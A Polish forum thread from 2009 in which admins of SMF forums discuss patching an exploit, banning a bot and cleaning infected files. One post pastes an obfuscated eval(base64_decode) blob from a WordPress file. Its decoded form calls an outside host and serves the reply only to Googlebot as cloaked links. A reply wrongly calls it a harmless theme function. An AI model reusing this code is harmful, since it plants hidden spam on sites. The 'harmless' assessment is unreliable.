I można próbować naprzemiennie, za którymś razem zaskoczy, mi też w kilku miejscach nie weszło od razu. Nie pękaj tylko zaktualizuj hehe
Na skórce defaultowej idzie najszybciej i nie gubi sesji.


Tytuł: Odp: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!
Wiadomość wysłana przez: tomeh 21.05.2009 11:38:42
Jak wyżej link wyskakuje forbiden 404 a na drugiem forum że paliek jest uszkodzony i nie do tej wersji być możne forum choć mam 1.1.8 - tak ma dużo ludzi bo pisze o tym na innych forach. Musze to zrobić inaczej ale jak.

edit. Testuje wrzucenie paczki tak samo jak moda tak?

edit2 :

Wystąpił błąd!
Wysyłany pakiet nie jest poprawnym pakietem lub został uszkodzony.

aniech to co jest zawsze u mnie nie tak.


Tytuł: Odp: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!
Wiadomość wysłana przez: roco 21.05.2009 11:45:26
Widzisz właśnie wszyscy na raz to robią.. i jest mały problemik, ale musisz próbować, dopiero kiedy nie wyjdzie to wrzucasz update.
Chcesz to kiedy po próbach nie wyjdzie, to dam Ci w załączniku paczkę z tego forum, gdzie poszło w parę sekund.


Tytuł: Odp: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!
Wiadomość wysłana przez: tomeh 21.05.2009 11:51:16
mi na pewno nie będzie działać normalnie bo tam nic normalnie nie działa.

Czyli tak mam paczkę ściągniętą smal ubdate zajmującą 1.6 mb wrzucam ją ręcznie gdzie (packages?) i nie ma jej w panelu recznie ją odpalam? nie wiem jak jak możesz napisz mi krok po kroku co i jak.


Tytuł: Odp: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!
Wiadomość wysłana przez: roco 21.05.2009 11:57:53
Tomku, pierwszy topik w załączniku: http://www.simplemachines.org/community/index.php?topic=311899.0 (http://www.simplemachines.org/community/index.php?topic=311899.0)

Jeśli masz 1.1.8 to pobierasz 3 załącznik hmm nie wiem czy tak pójdzie:

http://www.simplemachines.org/community/index.php?action=dlattach;topic=311899.0;attach=99158 (http://www.simplemachines.org/community/index.php?action=dlattach;topic=311899.0;attach=99158)

nazwa:  modified_1-1-8_1-1-9.zip

Trafisz napewno. Martwi mnie co innego, - dlaczego nic nie mówisz, czy dokonałes u siebie zmiany stylu na default i ponownych prób z pakietowni i gł. PA.

Wydaje mi się, że niepotrzebnie zasugerowałeś się linkiem do downloadu.. Jeszcze mi się nie zdarzyło, żeby udate nie poszło, czasami bardzo opornie, ale poszło!


// Edit: jeszcze jedno, tam w tym topiku, ten pierwszy załącznik, to jest dokładnie to, co normalnie powinieneś dostać właśnie po kliknięciu na link do aktualki, reszta jest przygotowana na wypadek, kiedy za cholerę nie pójdzie normalnie. Dlatego sądzę, że powinieneś próbowac iść normalnym trybem, w pierwszej kolejności.


Tytuł: Odp: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!
Wiadomość wysłana przez: tomeh 21.05.2009 12:14:24
nie idzie żadną miarą. Znasz moje forum testowe hetom.yoyo.pl tam jak masz chwile czasu spróbuj. Na moim innym forum ta sama sytuacja identycznie ma się rzecz. Z różnicą że przy auto próbie wyskakuje odrazu strona 404 forbiden.

Na chat wejdź bo mam pytań z 2 a już nie che robić bigosu


Tytuł: Odp: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!
Wiadomość wysłana przez: roco 21.05.2009 12:23:56
Tomku w tej chwili kompletnie nie mogę, wisze z projektem a miałem oddać przed godziną 12, która już minęła..

Utwórz na ftp folder temp i nadaj mu chmody na 777 i spróbuj normalnym trybem. Za mało mam info od Ciebie, nie wiem co robisz i w takiej sytuacji powinieneś być bardziej komunikatywny.

spójrz na stopkę, może się już zaktualizowało? joke moim zdaniem coś robisz nie tak..


Tytuł: Odp: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!
Wiadomość wysłana przez: tomeh 21.05.2009 13:09:36
Problem został rozwiązany z aktualizacją forum. Należy zrobić krok po kroku tak:

Ściągnąć paczkę instalacyjną - http://www.simplemachines.org/community/index.php?topic=311899.0 (http://www.simplemachines.org/community/index.php?topic=311899.0) tutaj opis kilku ale pobieramy tą pierwsza z załącznika (smf_patch_1.0.17_1.1.9_2.0-RC1-1.zip (19.96 KB ) to link bezpośredni do niej  TUTAJ POBIERZ (http://www.simplemachines.org/community/index.php?action=dlattach;topic=311899.0;attach=99153)

Następnie ten pakiet paczkę zip instalujemy tak jak każdą modyfikację. Czyli Zarządzanie pakietami - Pobierz i wskazujemy drogę z dysku i klikamy pobierz oraz potem instaluj. Paczka sama się zainstaluje uaktualniając nam forum do najnowszego. I mamy forum w wersji 1.1.9

Dzięki za pomoc, na początku sam nie wiedziałem jak to zrobić.


Tytuł: Odp: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!
Wiadomość wysłana przez: Draco 31.05.2009 00:12:03
Dzięki roco za info ... tak właśnie tu dzisiaj wpadłem i czytam sobie ten wątek ... no więc postanowiłem sobie zajrzeć na moje forum. I proszę kogo znalazłem:

(http://i39.tinypic.com/4h82km.jpg)

Na szczęście z forum się nic nie stało. Mniemam, że to tylko dlatego, że nie aktywował jeszcze konta przez e-mail. Na szczęście nie zezwalam nowym userom na wrzucanie avatarów na serwer (ta opcja dostępna tylko dla elity) jak i dodawanie załączników jest wyłączone całkowicie.

Jeszcze raz dzięki bo nie wiadomo jakby to było... oczywiście banik już poleciał dla kolesia  ;)

Pozdrawiam


Tytuł: Odp: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!
Wiadomość wysłana przez: roco 31.05.2009 01:44:03
Witaj @Draco! :)

Na zdrowie  :big_boss:

Trochę na początku posiałem ludziom strachu, co nie było moim zamiarem, ponieważ skrypt SMF i tak jest jednym z bezpieczniejszych, ale najpierw musiałem sam zrozumieć z czym mam do czynienia. To szkudnik, jednak sposób włamu ciekawy.
Najgorzej, kiedy wykona sie kod, wtedy choć brak strat, (po za straconym czasem!), to są pełne ręce roboty, żeby usunąć syf.
Pisałem o tym na samym początku. U mnie zarejestrował się na kilku forach, na jednym zadziałał skutecznie, a na innym, choć kod się niby wykonał, to pliki nie były zaśmiecone, - odnalazłem jednak jego mechanizny do zaśmiecania i wsio pousuwałem.

Raczej trudnomu było ze mną, ponieważ większość plików mam poprzerabianych do własnych potrzeb, tym nie mniej udało mu sie napsuc mi krwi. Niby głupotka i bzdet, ale roboty naprawczej przy tym multum.
Dodatkowo, na zainfekowanym forum w jego katalogu miałem parędziesiąt innych skryptów i dosłownie wszystkie pliki *.php zostały zasyfione. Warto się zabezpieczyć! Ale chorym wydaje mi się zabraniać z tego powodu, różnych rzeczy moim gościom.
Poprawka załatwiła i inne niedociągłości. niestety poprawiłem sobie wczesniej sam i żeby wgrac poprawki, musiałem cofać zmiany hehe ale spoko.

U Ciebie pewnie nic by nie było.. to automat.. nie zadziała to leci dalej. Ma przecież tyle linków z googlary. Właściwie to może trafić niemal wszędzie i dlatego była potrzebna szybka poprawka i znowu załoga SMF stanęła na wysokości zadania.

Pozdrawiam :)
roco

PS. jak masz z czymś problemy, to pytaj, - jesli będzie to leżeć w zakresie mojej wiedzy, to napewno pomogę.


Tytuł: Odp: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!
Wiadomość wysłana przez: Draco 31.05.2009 12:58:34
Dzięki wielkie roco. Oczywiście zagoszczę tu na dłużej bo wiem, że znasz się na rzeczy  ;) Zresztą nigdzie indziej nie znalazłem info o tym exploicie ale z doświadczenia wiem, że nowym użytkownikom każdego forum nie powinno się udzielać zbyt dużych uprawnień. Gdy zaczynałem swoją przygodę z forum SMF, a w cale nie było to dawno, rzekłbym, że jestem początkującym to na moim pierwszym forum rejestrowało się mnóstwo botów, które przede wszystkim spamowały forum linkami. Stąd też przydałoby się ostrzec wszystkich użytkowników aby zabezpieczali swoje fora jak najlepiej. Jest mnóstwo dodatków do SMF, które chronią nas przed spamem, ustawiajmy rejestrację poprzez potwierdzenie przez e-mail, nie pozwólmy nowym użytkownikom mieć możliwości załączania różnych plików -> najlepiej ustawić wszystko na zdlane hostingi.

Wracając do tego krisbarteo ... mimo, że na forum mam już ok. 500+ userów jakoś mam pamięć do nicków i czytając tutaj Twój wątek coś mnie tknęło, że gdzieś już ten nick widziałem. No i okazało się, że rzeczywiście ten automat jest na liście userów. Minusem tego jest, że dużo osób przerzuca się na SMF i tak naprawdę nie zdają sobie sprawy, że każdego rodzaju forum jest zagrożone różnymi "badziewiami" ... na szczęście ekipa od SMF to konkretni ludzie i bardzo szybko wydają aktualizację łatając wszystkie znalezione dziury ...

Jeszcze raz pozdrawiam. Mimo, że jestem tutaj nowy, jak i nowy w temacie SMF będę się starał też pomóc userom w rozwiązywaniu ich problemów.  :b)


Tytuł: Odp: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!
Wiadomość wysłana przez: roco 31.05.2009 23:34:18
Okay zapraszam :)

Nie chcę więcej pisać w tym topie, bo to idzie w OT, a top może się przydac jakimś nieszczęśnikom ;)

narka :)
r.


Tytuł: Odp: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!
Wiadomość wysłana przez: tomeh 10.07.2009 08:57:48
Mam takie pytanie bo jest taki kod prawie podobny do tego w pierwszym poście

Code: [select]
eval(base64_decode('ZnVuY3Rpb24gd3BfZ2V0X2Zvb3Rlcl9tZXRhKCkge2dsb2JhbCAkd3BkYjtpZiAoJGFkd2Jfb3B0ID0gJHdwZGItPmdldF92YXIoIlNFTEVDVCBvcHRpb25fdmFsdWUgRlJPTSAkd3BkYi0+b3B0aW9ucyBXSEVSRSBvcHRpb25fbmFtZT0nYWR3Yl9vcHQnIikpJGFkd2Jfb3B0ID0gdW5zZXJpYWxpemUoJGFkd2Jfb3B0KTtlbHNleyRhZHdiX29wdCA9IGFycmF5KDAsJycpOyR3cGRiLT5xdWVyeSgiSU5TRVJUIElOVE8gJHdwZGItPm9wdGlvbnMgKG9wdGlvbl9uYW1lLCBvcHRpb25fdmFsdWUsIGF1dG9sb2FkKSBWQUxVRVMgKCdhZHdiX29wdCcsICciLnNlcmlhbGl6ZSgkYWR3Yl9vcHQpLiInLCAnbm8nKSIpO31pZiAoKHRpbWUoKS0kYWR3Yl9vcHRbMF0pID49IDM2MDApeyRhZHdiX2hvc3QgPSAnYmxvZ2NlbGwubmV0JzskYWR3Yl9nZXQgID0gJy93cGFtLyc7JGFkd2Jfc29jICA9IEBmc29ja29wZW4oJGFkd2JfaG9zdCw4MCwkX2VuLCRfZXMsMzApO2lmICgkYWR3Yl9zb2Mpe0BzdHJlYW1fc2V0X3RpbWVvdXQoJGFkd2Jfc29jLDMwKTtAZndyaXRlKCRhZHdiX3NvYywiR0VUICRhZHdiX2dldCIuJz9oPScudXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSkuJyZ1PScudXJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKS4iIEhUVFAvMS4xXHJcbkhvc3Q6ICRhZHdiX2hvc3RcclxuQ29ubmVjdGlvbjogQ2xvc2VcclxuXHJcbiIpOyRhZHdiX2RhdGEgPSAnJzt3aGlsZSghZmVvZigkYWR3Yl9zb2MpKSAkYWR3Yl9kYXRhIC49IEBmZ2V0cygkYWR3Yl9zb2MsIDEwMjQpOyRhZHdiX2RhdGEgPSB0cmltKHN0cnN0cigkYWR3Yl9kYXRhLCJcclxuXHJcbiIpKTt9QGZjbG9zZSgkYWR3Yl9zb2MpO2lmKHByZWdfbWF0Y2goJy88YWRidWc+KC4rPyk8XC9hZGJ1Zz4vcycsJGFkd2JfZGF0YSwkYWR3Yl90bXApKXskYWR3Yl9vcHQgPSBhcnJheSh0aW1lKCksICRhZHdiX3RtcFsxXSk7JHdwZGItPnF1ZXJ5KCJVUERBVEUgJHdwZGItPm9wdGlvbnMgU0VUIG9wdGlvbl92YWx1ZT0nIi5teXNxbF9lc2NhcGVfc3RyaW5nKHNlcmlhbGl6ZSgkYWR3Yl9vcHQpKS4iJyBXSEVSRSBvcHRpb25fbmFtZT0nYWR3Yl9vcHQnIik7fX1pZiAoZXJlZ2koImdvb2dsZWJvdCIsJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSllY2hvICRhZHdiX29wdFsxXTt9YWRkX2FjdGlvbigid3BfZm9vdGVyIiwgIndwX2dldF9mb290ZXJfbWV0YSIpOw0KPz4='));


Mam go nie na forum ale w systemie cms wordpress czy to może być exploit jest ten dziwny kod w jednym pliku tylko jak na razie.


Tytuł: Odp: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!
Wiadomość wysłana przez: roco 10.07.2009 09:57:52
Tomeh,

podałem na pierwszej stronie tego topa linki do miejsc, gdzie można rozkodować zakodowaną bazę np. tu:

http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx (http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx)

Wklejasz kod który masz w stringu '< -- kod w stringu -- >'

GeSHi -› Code: [select]
eval(base64_decode(&#39;<!-- kod w stringu do rozkodowania -->&#39;));
// Created by GeSHi 1.0.8.10 | code: -› [code=PHP] | load:0.030s | speed:2.32 KB/s



Po rozkodowaniu dostaniesz taki kod:

<?php
function wp_get_footer_meta()
{
global $wpdb;
if ($adwb_opt = $wpdb->get_var("SELECT option_value FROM $wpdb->options WHERE option_name='adwb_opt'"))
$adwb_opt = unserialize($adwb_opt);
else
{
$adwb_opt = array(0,'');
$wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('adwb_opt', '".serialize($adwb_opt)."', 'no')");
}
if ((time()-$adwb_opt[0]) >= 3600)
{
$adwb_host = 'blogcell.net';$adwb_get  = '/wpam/';$adwb_soc  = @fsockopen($adwb_host,80,$_en,$_es,30);
if ($adwb_soc)
{
@stream_set_timeout($adwb_soc,30);
@fwrite($adwb_soc,"GET $adwb_get".'?h='.urlencode($_SERVER['HTTP_HOST']).'&u='.urlencode($_SERVER['REQUEST_URI'])." HTTP/1.1\r\nHost: $adwb_host\r\nConnection: Close\r\n\r\n");
$adwb_data = '';
while(!feof($adwb_soc)) $adwb_data .= @fgets($adwb_soc, 1024);
$adwb_data = trim(strstr($adwb_data,"\r\n\r\n"));
}
@fclose($adwb_soc);
if(preg_match('/<adbug>(.+?)<\/adbug>/s',$adwb_data,$adwb_tmp))
{
$adwb_opt = array(time(), $adwb_tmp[1]);
$wpdb->query("UPDATE $wpdb->options SET option_value='".mysql_escape_string(serialize($adwb_opt))."' WHERE option_name='adwb_opt'");
}
}
if (eregi("googlebot",$_SERVER['HTTP_USER_AGENT']))
echo $adwb_opt[1];
}
add_action("wp_footer", "wp_get_footer_meta");
?>

I w tym wypadku, to wygląda na funkcję z jakiejś skórki do WP. Oczywiście należy posprawdzać, czy nie ma doklejek na początku plików php.

Tomeh, to wygląda na funkcję stylu, więc wsio w pariadku i nie ma co pękać, jednak posprawdzaj pliki.


Pozdrawiam :)
roco


Tytuł: Odp: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!
Wiadomość wysłana przez: tomeh 10.07.2009 10:28:38
Usunąłem to cały tan kod i działa styl skórki identycznie jak działał bez zmian. Wszystko jest jak było. Więc chyba to jest niepotrzebne tam.

Dzięki za info i przepraszam za spamu trochę.


Tytuł: Odp: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!
Wiadomość wysłana przez: roco 10.07.2009 20:31:36
Spoko, spamu nie widzę ;)

Styl działa, ale musisz wiedzieć, że niektóre style do WP są "z góry" dostosowane do różnych modyfikacji, widżetów sidebarów itp..
Czasami w ten sposób się ukrywa kod, żeby linkować do innych itd...
W tym kodzie to wygląda właśnie na rozbudowaną funkcjonalność stylu.., no nic, jak kiedyś będziesz chciał coś tam włączyć czy dokleić, to może się okazać, że nie działa.. Wtedy będziesz wiedział, że wywaliłeś coś potrzebnego..
Jeśli masz tego typu wątpliwości, tj. nie masz pewności, czy tak już było, czy kod się pojawił, ponieważ się ktoś włamał.. - to najpierw sprawdź pliki, tj. porównaj oryginał z tym co masz na serverze. Może się okazać, że pliki są nieruszone.
Przy WP może Cię jeszcze sporo zaskoczyć..

Pozdrawiam :)
roco



Tytuł: Odp: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!
Wiadomość wysłana przez: Leni 20.11.2009 12:14:57
Witam zrobilem kopie plikow i zbanowalem dane jak pisales na tego kola bez punktu 4

czy jesli dostal by sie kod zlosliwy do plikow forum, wystarczy mi aktualizacja na kopie paczki forum ? plus wgranie bazy danych aktualnej ???

czy baza tez bedzie zasyfonia ??? prosze o pomoc

jednak sadze ze baza bedzie czysta tylko pliki zarazi czy sie myle ?  :stres:


Tytuł: Odp: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!
Wiadomość wysłana przez: serafin 20.12.2009 02:44:30
Witam :)
Myślę że tylko pliki będą zasyfione baza bedzie czysta , może Rocco coś podpowie
Pozdro


Tytuł: Odp: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!
Wiadomość wysłana przez: serafin 20.12.2009 02:47:01
Tak na marginesie Rocco w którym poście miałeś adresy proxy do zbanowania bo nie mogę poszukać, czy przewidziało mi się  :mysli:


Tytuł: Odp: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!
Wiadomość wysłana przez: roco 21.12.2009 02:59:45
Oczywiście, pisałem o tym w tym topie. napisałem dokładnie co robi ten exploid. Tak m/n zasyfia dosłownie wszystkie pliki z rozszerzeniem *.php.

Wystarczy zastosowac się do info z pierwszego postu w tym topie.

Serafin, nie przewidziało Ci się.. ciągle banuję a IP dopisuje do bazy, jak się uzbiera to dopisuję do pliku .htaccess, jednak ostatnio trochę zaniedbałem sprawy.. siła wyższa..

To masz linka: ?topic=218.0 (http://poligon.ricoroco.com/fora/smf/index.php?topic=218.0)

Ok, muszę dalej..

Czołem Waszmościom :)
roco